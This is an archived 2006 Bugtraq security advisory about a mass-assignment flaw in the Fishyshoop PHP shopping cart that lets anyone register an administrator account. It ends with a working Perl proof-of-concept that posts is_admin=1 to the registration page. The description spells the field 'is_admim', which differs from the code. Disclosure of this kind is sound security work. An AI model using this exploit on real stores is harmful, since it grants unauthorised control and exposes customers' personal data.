lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3fb9fda50612240119u3b9b2243xc1042928e4b603dc@mail.gmail.com>
Date: Sun, 24 Dec 2006 22:19:00 +1300
From: "James Gray" <james6.0@...il.com>
To: bugtraq@...urityfocus.com
Subject: Fishyshoop Security Vulnerability

Synopsis
========
The Fishyshoop shopping cart software contains a vulnerability which
allows arbitrary users to create accounts with administrator
privileges

Background
==========
Fishyshoop is a suite of PHP scripts allowing anybody to create an
attractive online store.

Affected Versions
=================
Verified on 0.930 beta. Previous versions may also be affected.

Impact
======
The user gains administrator privileges in the software, meaning they
are free to alter many aspects of the store, as well as committing
theft of personal information belonging to other users of the store.

Description
===========
pages/register/register.php takes every POST variable and inserts the
value into a new record under a field with the same name. If a new
registration is made with the variable is_admim set to 1, the account
will have administrator privileges on the site.

Proof of Concept
================
#!/usr/bin/perl

use WWW::Curl::Easy;

sub usage() {
  print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
  exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS,
"email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ